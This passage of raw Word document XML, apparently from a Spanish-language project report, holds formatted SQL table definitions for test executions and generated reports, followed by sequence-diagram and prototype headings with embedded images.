          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>500</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NOT</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3366"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4213">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15374248"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AA4213">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t xml:space="preserve">    metodo </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4213">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333399"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>VARCHAR</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4213">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4213">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0000DD"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>10</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NOT</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3366"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4213">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F68B44"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AA4213">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t xml:space="preserve">tiempo_respuesta_ms </w:t>
      </w:r>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333399"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>INT</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NOT</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3366"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244971A4"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30013F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4213">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t xml:space="preserve">codigo_estado_http </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4213">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333399"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>INT</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4213">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3099746D"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AA4213">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t xml:space="preserve">    exito BOOLEAN,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1436E5"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AA4213">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t xml:space="preserve">fecha_hora </w:t>
      </w:r>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333399"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>TIMESTAMP</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DEFAULT</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CURRENT_TIMESTAMP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448A92A2"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13282779"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p>
    <w:p w14:paraId="067EFF8A"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888888"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>-- Tabla de reportes generados</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511DF58C"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AA4213">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="008800"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>CREATE</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TABLE</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66BB"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>reporte</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4213">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0561E058"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AA4213">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t xml:space="preserve">    id SERIAL </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4213">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="008800"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>PRIMARY</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4213">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4213">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="008800"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>KEY</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4213">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E83356"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AA4213">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t xml:space="preserve">id_ejecucion </w:t>
      </w:r>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333399"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>INT</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REFERENCES</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66BB"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>ejecucion_prueba</w:t>
      </w:r>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t xml:space="preserve">(id) </w:t>
      </w:r>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="008800"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>ON</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DELETE</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CASCADE</w:t>
      </w:r>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650639E4"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 xml:space="preserve">    tipo_reporte </w:t>
      </w:r>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333399"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>VARCHAR</w:t>
      </w:r>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0000DD"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>50</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CHECK</w:t>
      </w:r>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t xml:space="preserve"> (tipo_reporte </w:t>
      </w:r>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="008800"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>IN</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color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFF0F0"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>'HTML'</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color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFF0F0"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>'CSV'</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color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFF0F0"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>'JSON'</w:t>
      </w:r>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>)),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE7BCE4"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 xml:space="preserve">    fecha_generacion </w:t>
      </w:r>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333399"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>TIMESTAMP</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DEFAULT</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b/>
          <w:bCs/>
          <w:color w:val="008800"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>CURRENT_TIMESTAMP</w:t>
      </w:r>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6746413B" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="0030013F"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val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t xml:space="preserve">    path_archivo </w:t>
      </w:r>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333399"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>VARCHAR</w:t>
      </w:r>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0000DD"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>500</w:t>
      </w:r>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>-- Ruta donde se guarda el reporte generado</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D415C70" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="00AA4213" w:rsidRDefault="0030013F" w:rsidP="0030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lang w:eastAsia="es-BO"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA4213">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F83ECA9" w14:textId="77777777" w:rsidR="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F"/>
    <w:p w14:paraId="3D8B9470" w14:textId="77777777" w:rsidR="00B52F07" w:rsidRDefault="00B52F07" w:rsidP="0030013F"/>
    <w:p w14:paraId="24E06552" w14:textId="77777777" w:rsidR="00B52F07" w:rsidRDefault="00B52F07" w:rsidP="0030013F"/>
    <w:p w14:paraId="270E039D" w14:textId="77777777" w:rsidR="00B52F07" w:rsidRDefault="00B52F07" w:rsidP="0030013F"/>
    <w:p w14:paraId="180895A9" w14:textId="77777777" w:rsidR="00B52F07" w:rsidRDefault="00B52F07" w:rsidP="0030013F"/>
    <w:p w14:paraId="7DA8DBC8" w14:textId="77777777" w:rsidR="00B52F07" w:rsidRDefault="00B52F07" w:rsidP="0030013F"/>
    <w:p w14:paraId="231ADD2C" w14:textId="1C622EC4" w:rsidR="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>DIAGRAMA DE SECUENCIA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A3A94A" w14:textId="77777777" w:rsidR="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F"/>
    <w:p w14:paraId="19A26097" w14:textId="77777777" w:rsidR="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="002D0BCC" wp14:editId="5B2A3C1E">
            <wp:extent cx="3949700" cy="28824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4281" cy="2885758"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="05603921" w14:textId="77777777" w:rsidR="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F"/>
    <w:p w14:paraId="577C6A46" w14:textId="77777777" w:rsidR="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F"/>
    <w:p w14:paraId="5B05DD9D" w14:textId="77777777" w:rsidR="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F"/>
    <w:p w14:paraId="0B13B63E" w14:textId="77777777" w:rsidR="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E512EC7" wp14:editId="0B7C7564">
            <wp:extent cx="3746500" cy="2912608"/>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4749" cy="2919021"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4312B6" w14:textId="77777777" w:rsidR="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F"/>
    <w:p w14:paraId="3E318DB5" w14:textId="77777777" w:rsidR="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F"/>
    <w:p w14:paraId="0E163E6F" w14:textId="77777777" w:rsidR="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F"/>
    <w:p w14:paraId="0665EE76" w14:textId="77777777" w:rsidR="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40B042C9" wp14:editId="44FF0178">
            <wp:extent cx="3619496" cy="23876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3466" cy="2390219"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7DB6F0" w14:textId="7F029BC3" w:rsidR="0030013F" w:rsidRDefault="0030013F" w:rsidP="00B52F07">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58885F11" w14:textId="77777777" w:rsidR="00B52F07" w:rsidRDefault="00B52F07" w:rsidP="00B52F07">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C9FDD5F" w14:textId="77777777" w:rsidR="00B52F07" w:rsidRDefault="00B52F07" w:rsidP="0030013F"/>
    <w:p w14:paraId="6C3EF046" w14:textId="02B3F3E2" w:rsidR="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:r>
        <w:t>PROTOTIPO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4594A983" w14:textId="77777777" w:rsidR="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7337D8A2" w14:textId="77777777" w:rsidR="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06BF9555" wp14:editId="7ED0953F">
            <wp:extent cx="4919140" cy="2276475"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="19" name="Imagen 19" descr="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Met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111" t="8999" r="7037" b="5598"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4920679" cy="2277187"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="407EBB15" w14:textId="77777777" w:rsidR="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F"/>
    <w:p w14:paraId="07110E6F" w14:textId="77777777" w:rsidR="00B52F07" w:rsidRDefault="00B52F07" w:rsidP="0030013F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10B5BCF2" w14:textId="221E7F94" w:rsidR="0030013F" w:rsidRPr="00E04661" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E04661">
        <w:rPr>
